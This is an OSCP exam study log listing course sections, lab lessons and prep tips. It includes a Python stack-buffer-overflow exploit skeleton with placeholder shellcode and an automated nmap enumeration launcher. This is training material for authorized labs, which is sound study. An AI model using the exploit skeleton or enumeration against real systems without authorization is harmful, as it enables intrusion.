OSCP Exam Cram Log – Aug/Sept/Oct 2018

I’ll be using this as a means of tracking my personal study progress toward the OSCP exam by keeping a daily log.  Scheduled exam date: 11/09/2018

PART ONE: Review of OSCP Videos and PWK Readings

With a total of 149 videos and 375 pages’ worth of readings to review, I’ll aim to get through around 15 pages daily (plus the corresponding videos and exercises) to finish this first stage within a month.

Day 1 (8/30/2018)
Section 0: Penetration Testing: What You Should Know
PWK Readings: 13-33
PWK Videos: 0-1
Additional Review: Open Source Security Testing Methodology Manual, OSCP Certification Exam Guide, PWK Reporting

Day 2 (8/31/2018)
Section 1: Getting Comfortable with Kali Linux
PWK Readings: 34-49
PWK Videos: 3-10
Additional Review: Bash & Python scripting (for pen-testing) research/practice

Day 3 (9/01/2018)
Section 2.1: Netcat / Section 2.2: Ncat
PWK Readings: 50-64
PWK Videos: 11-18
Additional Review: nc/ncat/sbd options.  Ncat Cheat Sheet (also includes other pentestmonkey reverse shell examples)

Day 4 (9/02/2018)
Section 2.3: Wireshark / Section 2.4: Tcpdump / 3.1.1: Passive Information Gathering: Google
PWK Readings: 65-82
PWK Videos: 19-21
Additional Review: Tcpdump & Wireshark Cheat Sheets, Tcpdump Primer

Day 5 (9/03/2018)
Section 3.1.2: Google Hacking / 3.2: Email Harvesting / 3.3 Additional Resources / 3.4: Recon-ng
PWK Readings: 83-95
PWK Videos: 22-23
Additional Review: Google Hacking Database (GHDB), Recon-ng module exploration

Day 6 (9/04/2018)
Section 4.1: DNS Enumeration / 4.2: Port Scanning
PWK Readings: 96-119
PWK Videos: 24-38
Additional Review: Subdomain Enumeration, DNSRecon, DNSenum options, Experimentation with Nmap Grep-able output, NMAP Cheat Sheet, Researching popular NSE scripts for Nmap.

Day 7 (9/05/2018)
Section 4.3: SMB Enumeration / 4.4: SMTP Enumeration / 4.5 SNMP Enumeration
PWK Readings: 120-133
PWK Videos: 39-48
Additional Review: Modern (3.X) SMB Vulns, SMTP User Enumeration Practice with GoldenEye Vulnhub VM, Reviewed section of the Necromancer VM requiring snmpwalk and community strings.

Day 8 (9/06/2018)
Section 5: Vulnerability Scanning / Section 6: Buffer Overflows
PWK Readings: 134-151
PWK Videos: 49-54
Additional Review: BOF examples, brainpan.exe from Brainpan VM

Day 9 (9/07/2018)
Section 7: Win32 Buffer Overflow Exploitation
PWK Readings: 152-172
PWK Videos: 55-63
Additional Review: Vulnserver

Day 10 (9/08/2018)
Section 8: Linux Buffer Overflow Exploitation
PWK Readings: 173-184
PWK Videos: 64-69
Additional Review: TODO – More BOF practice (exercises from books, vulnserver.exe, Protostar/Fusion/Nebula, Corelan writeups, Fortress: Jet on HacktheBox, Chatterbox & other HTB machines).  Ideally I should prep skeleton code for fuzzing and for each stage of BOF exploitation, along with ready-made notes or commented-out lines for different architectures, encoding schemes, payload types, common bad characters to avoid, etc.

Day 11 (9/09/2018)
Section 9: Working with Exploits
PWK Readings: 185-194
PWK Videos: 70-75
Additional Review: HTB lab practice.

Day 12 (9/10/2018)
Section 10: File Transfers
PWK Readings: 195-205
PWK Videos: 76-80
Additional Review: Research on obfuscation techniques for transfer methods.

Day 13 (9/11/2018)
Section 11: Privilege Escalation
PWK Readings: 206-213
PWK Videos: 81-85
Additional Review: Linux Priv-esc Cheat Sheet, Windows Priv-esc Cheat Sheet

Day 14 (9/12/2018)
Section 12: Client Side Attacks
PWK Readings: 214-227
PWK Videos: 86-88
Additional Review: Msfvenom Cheat Sheet

Day 15 (9/13/2018)
Section 13.1: Essential Firefox Add-ons / Section 13.2: Cross Site Scripting / 13.3: File Inclusion Vulnerabilities
PWK Readings: 228-244
PWK Videos: 89-90
Additional Review: OWASP – Testing for Input Validation, Another Example of Log Poisoning for LFI

Day 16 (9/14/2018)
Section 13.4: MySQL SQL Injection / Section 13.5: Web Application Proxies
PWK Readings: 245-259
PWK Videos: 91-95
Additional Review: SQLi Cheat Sheet, Testing for SQL Injection

Day 17 (9/15/2018)
Section 13.6: Automated SQL Injection Tools / 14.1: Preparing for Brute Force / 14.2: Online Password Attacks
PWK Readings: 260-279
PWK Videos: 96-106
Additional Review: Mimikatz, More from BHIS

Day 18 (9/16/2018)
Section 14.3: Password Hash Attacks / 15.1: Port Forwarding/Redirection / 15.2 SSH Tunneling
PWK Readings: 280-295
PWK Videos: 107-113
Additional Review:

Day 19 (9/17/2018)
Section 15.3: Proxychains / 15.4: HTTP Tunneling / 15.5: Traffic Encapsulation / 16.1: MSF UI / 16.2: Setting Up MSF / 16.3: Exploring MSF / 16.4: Auxiliary Modules
PWK Readings: 296-313
PWK Videos: 114-120
Additional Review: Additional research on proxychains usage, popular usages of MSF in pentesting.

Day 20 (9/18/2018)
Section 16.5: Exploit Modules / 16.6: Metasploit Payloads
PWK Readings: 314-326
PWK Videos: 121-127
Additional Review: Exploring which shells (single/multi-stage, type, etc.) might be used for different reasons.

Day 21 (9/19/2018)
Section 16.7: Building Your Own MSF Module / 16.8: Post Exploitation with Metasploit / 17: Bypassing Antivirus Software
PWK Readings: 327-340
PWK Videos: 128-132
Additional Review: Exploration of current AV-evasion techniques.

Day 22 (9/20/2018)
Section 18: Assembling the Pieces: Penetration Test Breakdown (18.1-18.6.3) – Scenario Description, Information Gathering, Vuln Identification & Prioritization, R&D, Exploitation, and Post-Exploitation Phases
PWK Readings: 341-357
PWK Videos: 133-141
Additional Review: Researching other publicly available pen-test reports, play-by-plays, templates.

Day 23 (9/21/2018)
Section 18.6.4: Port Tunneling / 18.6.5: SSH Tunneling with HTTP Encapsulation / 18.6.6: Looking for High Value Targets / 18.6.7: Domain Privilege Escalation / 18.6.8: Going for the Kill
PWK Readings: 357-375
PWK Videos: 142-148
Additional Review:

PART TWO: Begin Lab Time (30 days)

Day 1 (9/22/2018)
Difficulties: Efficient NMAP enumeration, linux privesc enumeration, making assumptions (!), efficiency.
Remedies or things for review: Check everything.  Even security products may have a vulnerability to exploit.  Priv-esc scripts are helpful for enumerating possible weaknesses, but many of those steps should also be repeated by hand until they are committed to memory.  Do high-level research on the available services first and try to estimate which would be easiest to exploit.  Dirbuster and more in-depth scans should be kicked off immediately and left running while you work on other things, to save time.  “nmap -sTU --top-ports ###” for a quick initial network segment scan (the UDP part needs root).

Day 2 (9/23/2018)
Difficulties: Getting Stuck
Remedies or things for review: Always try stupid things first.  Input restrictions are not always intelligent, so just try a variety of different things; don’t over-complicate.  Passwords are sometimes that easy (admin:admin, username:username, username:emanresu, etc.).  Linux Privesc Vid | Windows Privesc Vid

Day 3 (9/24/2018)
Difficulties: Enumeration, Unstable shells
Remedies or things for review: When you think you’ve looked at everything, assume you haven’t and look again with fresh eyes.  In case of shells dropping try a variety of payloads (generic/arch-specific, staged/non, etc.), if that doesn’t work maybe something is killing your process.  If you’re running a meterpreter session maybe you need to migrate to a safe place, maybe you just need to kill the thing that is about to kill you.  🙂

Day 4 (9/25/2018)
Enumerate enumerate enumerate.   Even though this advice is sometimes as annoying as someone saying to “try harder”, it’s very true.  If you’re stuck or keep looking at a service using the same tool look into other ways to enumerate, or just look up more information on how the service itself works.  Different tools have different strengths and sometimes they miss things that you just won’t find without getting a second opinion.

Day 7 (9/28/2018)
Feeling frustrated is part of the process.  I’ve been pretty lucky in the labs to get elevated privileges right off the bat, but am having a much harder time elevating low-privilege users on Windows vs. Linux systems.  This resource and others are helping considerably.  I’m making good progress in terms of total compromised lab machines, but I’m also realizing I need a lot more practice to become efficient and quick about the entire process.

Day 17 (10/08/2018)
Making pretty good progress through the lab machines so far.  I’ve been trying to balance my time between the labs and watching instructional videos on exploiting the specific services I’m running across in the labs, to better understand them and spot similar things in the future.  Privesc, especially on Windows systems, is something I’m struggling with a lot but am slowly getting better at.  Watching Ippsec’s HacktheBox/Vulnhub walkthroughs has been very helpful for polishing enumeration skills, running more effective initial scans, and general service exposure.  More than I anticipated, managing emotions/frustration has been a big hurdle throughout the OSCP process.  Learning to take a break when you’re not getting anywhere is very important.  Coming back with fresh eyes and a level head will do you far more good than hammering down the same path for extended periods.  Typically the most frustrating boxes are the ones that teach you the most, are the most memorable, and are the most satisfying when you finally root them.  Something to always keep in mind.

PART THREE: Final Prep for Exam

7 days until exam (11/02/2018)

It’s been a long time since my last update, and I finished up my 30 days of lab time as of Oct 21.  I was keeping a good pace, generally doing at least 1 lab machine a day, sometimes 2-3 depending on the difficulty.  In the case of some of the more notoriously difficult ones…they ended up taking a couple of days each.  I have mixed feelings at this point: with very few exceptions I was eventually able to get through each box, and learned valuable lessons from them, but each did take some time, and the fear is that if I see something with similar “newness” on the exam I could be pretty seriously crunched for time.  Since I can’t anticipate whether the boxes chosen will align with my specific experience or not, the best I can do is focus on doing what I know now as quickly and efficiently as possible to allot more time for the “unknown”.  Part of that is having information ready at hand and not having to dig for it.

I was initially going to compile a list of resources I use frequently into sort of a wiki/cheat sheet, but finding that others have already done a lot of this hard work for me I will just go ahead and plug a list here:

Passing OSCP – Long list of common enumeration methods, shells, frequently used payloads, file transfer methods, PrivEsc resources + script checkers, etc.

And here are some other resources that I find I use constantly:

Upgrading simple shells to fully interactive TTYs

Transferring Files from Linux to Windows (post-exploitation) – Transferring files via SMB isn’t covered in the PWK materials but it’s an extremely easy way to push files back and forth for Windows machines.

Pspy – This might be a new favorite tool for the labs + CTF boxes in general.  Have a shell but don’t have access to see what cronjobs or automated commands are running as root? Grab them as they run in the process list.

For PrivEsc I constantly refer back to the g0tmi1k (Linux) + FuzzySecurity (Windows) which are in the Passing OSCP guide.

One other thing I did to prep for the BOF portion: as I went through each step of the exercises I copied my Python code to a new, separately numbered file.  That way I can come back to this skeleton code on the exam if I need to and just modify the existing code to work with the target machine.
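To make that idea concrete, here is an added example of what such a skeleton can look like, written for this page and not taken from the author’s numbered files.  It collects one helper per stage of the classic stack-overflow workflow (fuzz, find the EIP offset with a cyclic pattern, detect bad characters, assemble the final buffer) so that only the host, port, command prefix, return address and shellcode change between targets.  HOST, PORT and the return address are placeholders; “TRUN /.:/” is the command prefix used in most public vulnserver walkthroughs and is here only as an illustration.

```python
import socket
import string
import struct

# Added example, not the author's skeleton: helpers for each stage of a classic
# stack-overflow workflow (fuzz -> find offset -> bad chars -> build exploit).
# HOST, PORT and PREFIX are placeholders; "TRUN /.:/" is the classic vulnserver
# command seen in public walkthroughs. Change all three for your own target.
HOST, PORT = "10.11.1.1", 9999
PREFIX = b"TRUN /.:/"


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...); every 4-byte window is unique
    within the first 20280 bytes, which is what makes the offset lookup work."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(needle, length=20280):
    """Offset of a crash value inside the pattern.  `needle` may be bytes, a str, or
    the EIP value read from the debugger as an int (packed little-endian here)."""
    if isinstance(needle, int):
        needle = struct.pack("<I", needle)
    elif isinstance(needle, str):
        needle = needle.encode()
    return pattern_create(length).find(needle)  # -1 if not found


def badchar_string(exclude=(0x00,)):
    """All byte values to send after the return address; \\x00 is excluded up front
    because it terminates C strings and would cut the test short."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mangled_byte(sent, observed):
    """Compare what was sent with the bytes dumped from the stack in the debugger.
    Returns the first byte that was altered or dropped, or None if all survived.
    Add that byte to `exclude`, resend, and repeat until this returns None."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_badchars(chunk, bad):
    """Byte values in `chunk` that are on the bad-character list (should be empty)."""
    return [b for b in chunk if b in bad]


def build_exploit(offset, ret_addr, shellcode, bad=b"\x00", nop_len=16):
    """Filler up to the saved return address, the overwrite (e.g. a JMP ESP found
    with mona), a NOP sled, then the encoded shellcode from msfvenom."""
    ret = struct.pack("<I", ret_addr)
    for chunk, name in ((ret, "return address"), (shellcode, "shellcode")):
        hits = find_badchars(chunk, bad)
        if hits:
            raise ValueError(f"{name} contains bad chars: {hits}")
    return b"A" * offset + ret + b"\x90" * nop_len + shellcode


def send_payload(host, port, prefix, payload, timeout=5):
    """Send one buffer; returns the service's reply, or None if it stopped answering."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                      # banner
            s.send(prefix + payload + b"\r\n")
            return s.recv(1024)
    except (OSError, socket.timeout):
        return None


def fuzz(host, port, prefix, start=100, step=100, limit=5000):
    """Stage 1: send growing buffers until the service stops answering; returns the
    last length that got a reply, so the crash happened between that and +step."""
    last_ok = 0
    for n in range(start, limit + 1, step):
        if send_payload(host, port, prefix, b"A" * n) is None:
            break
        last_ok = n
    return last_ok


if __name__ == "__main__":
    # Stage 2: send pattern_create(crash_len), read EIP from the debugger, then:
    eip_from_debugger = 0x37614136        # placeholder value (== "6Aa7" in the pattern)
    offset = pattern_offset(eip_from_debugger)
    # Stage 3/4: send b"A"*offset + b"BBBB" + badchar_string(), compare the stack dump
    # with first_mangled_byte(), and grow `exclude` until nothing is mangled.
    # Stage 5: replace the placeholder address and shellcode with the real ones.
    exploit = build_exploit(offset, 0xDEADBEEF, b"\xcc" * 4)
    print(f"offset={offset} exploit_len={len(exploit)}")
```

The pure functions (pattern, offset, bad-character comparison, buffer assembly) are the part worth keeping between machines; the two network functions are the only ones that need the per-target prefix and framing, and `build_exploit` refuses to assemble a buffer whose return address or shellcode still contains a known bad character, which is the mistake that most often turns a working crash into a silent failure.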

One final recommendation would be to join the folks at NetSecFocus (Mattermost).  They have an OSCP-specific channel and tons of helpful people on if you need help on something, want recommendations for resources on learning a new topic, etc.

How am I spending this last week to prepare now that OSCP labs are finished?

  1. Planning sleep, food, and caffeine considerations (no joke).  Making sure to have a backup connection + spare OSCP VM setup (on planned machine and another computer just in case).
  2. Creating enumeration scripts that I can fire off and leave running in the background against other machines while I work on the active one, so I’m never sitting around waiting for something like Dirbuster to finish or for anything else that would be potentially time consuming.
  3. Hack the Box machines.  I recently bought a VIP membership which has been well worth it.  In addition to current machines it also gives access to a pool of retired machines a lot of which I’ve been going through now.  The “easier” machines there I would maybe more closely compare to some of the more common OSCP machines in terms of difficulty.  The added benefit of that is watching the associated Ippsec videos once complete to get more understanding + alternative methods for the boxes.
  4. Doing some mock exam reports with HTB machines to get used to the documentation process.
  5. More BOF examples.  Vulnserver, Brainpan I will probably repeat again for practice.
  6. Don’t panic.
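As an added example of the "fire off and background" enumeration script from item 2 above, and of the quick “nmap -sTU --top-ports” first pass from the Day 1 lab notes, the following is my own illustration rather than the author’s script: it parses nmap’s grepable (-oG) output, picks a couple of second-opinion tools per open service, de-duplicates them, and launches each one in the background with its own log file.  The sample scan output is constructed for a made-up lab host, and the tool choices (dirb, nikto, enum4linux, smbclient, snmpwalk, smtp-user-enum, NSE scripts) are this example’s; substitute whatever you keep in your own notes.

```python
import re
import shlex
import subprocess
from pathlib import Path

# Constructed sample of nmap grepable (-oG) output for a made-up lab host;
# not a real scan result.  Fields are port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP = (
    "# Nmap 7.70 scan initiated as: nmap -sTU --top-ports 100 -oG quick.gnmap 10.11.1.5\n"
    "Host: 10.11.1.5 ()\tStatus: Up\n"
    "Host: 10.11.1.5 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "445/open/tcp//microsoft-ds//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "161/open/udp//snmp//SNMPv1 server (public)/, "
    "53/closed/tcp//domain///\tIgnored State: closed (193)\n"
    "# Nmap done at Sat Oct 27 10:00:00 2018 -- 1 IP address (1 host up) scanned\n"
)


def initial_scan_cmd(target, top_ports=100, outfile="quick.gnmap"):
    """The quick first-pass scan from the Day 1 notes, with grepable output so the
    result can be fed to parse_gnmap() below.  The -sU (UDP) half needs root."""
    return ["nmap", "-sTU", "--top-ports", str(top_ports), "-oG", outfile, target]


def parse_gnmap(text):
    """Open ports from -oG output as dicts: host, port, proto, service, version."""
    entries = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports: ", 1)[1].split("\t", 1)[0]
        for item in ports_field.split(", "):
            port, state, proto, _owner, service, _rpc, version = item.split("/")[:7]
            if state != "open":
                continue
            entries.append({
                "host": host, "port": int(port), "proto": proto,
                "service": service,
                "version": version.replace("|", "/"),  # nmap writes '/' in versions as '|'
            })
    return entries


def followup_commands(entry):
    """Per-service second-opinion enumeration to kick off in the background.
    Tool choices are this example's; swap in whatever you keep in your own notes."""
    host, port, svc = entry["host"], entry["port"], entry["service"]
    if entry["proto"] == "udp" and svc == "snmp":
        return [["snmpwalk", "-c", "public", "-v1", host]]
    if svc in ("http", "https", "http-alt", "http-proxy"):
        url = f"{'https' if svc == 'https' else 'http'}://{host}:{port}/"
        return [["dirb", url], ["nikto", "-h", url]]
    if svc in ("netbios-ssn", "microsoft-ds"):
        return [["enum4linux", "-a", host], ["smbclient", "-L", f"//{host}", "-N"]]
    if svc == "ftp":
        return [["nmap", "-p", str(port), "--script", "ftp-anon,ftp-syst", host]]
    if svc == "smtp":
        return [["smtp-user-enum", "-M", "VRFY", "-U", "users.txt", "-t", host]]
    return [["nmap", "-sV", "-sC", "-p", str(port), host]]  # default: version + NSE


def plan_followups(gnmap_text):
    """Ordered, de-duplicated command list (139 and 445 both map to the same SMB checks)."""
    seen, plan = set(), []
    for entry in parse_gnmap(gnmap_text):
        for cmd in followup_commands(entry):
            if tuple(cmd) not in seen:
                seen.add(tuple(cmd))
                plan.append(cmd)
    return plan


def launch(plan, outdir, dry_run=True):
    """Start every command in the background with its output going to its own log file.
    dry_run=True only reports what would run; returns (logfile, command) pairs."""
    out = Path(outdir)
    launched = []
    for cmd in plan:
        logfile = out / (re.sub(r"[^A-Za-z0-9]+", "_", " ".join(cmd)).strip("_") + ".log")
        if not dry_run:
            out.mkdir(parents=True, exist_ok=True)
            with open(logfile, "wb") as fh:        # child keeps its own copy of the fd
                subprocess.Popen(cmd, stdout=fh, stderr=subprocess.STDOUT)
        launched.append((str(logfile), " ".join(shlex.quote(c) for c in cmd)))
    return launched


if __name__ == "__main__":
    # Real use: run initial_scan_cmd(...) first, then read the .gnmap file into plan_followups().
    for log, cmd in launch(plan_followups(SAMPLE_GNMAP), "enum/10.11.1.5"):
        print(f"{cmd}  > {log}")
```

Run with `dry_run=False` only once the command list looks right; every tool then runs detached from your shell and writes to `enum/<host>/<command>.log`, so you can move on to the next box and `tail` the logs later instead of waiting on them.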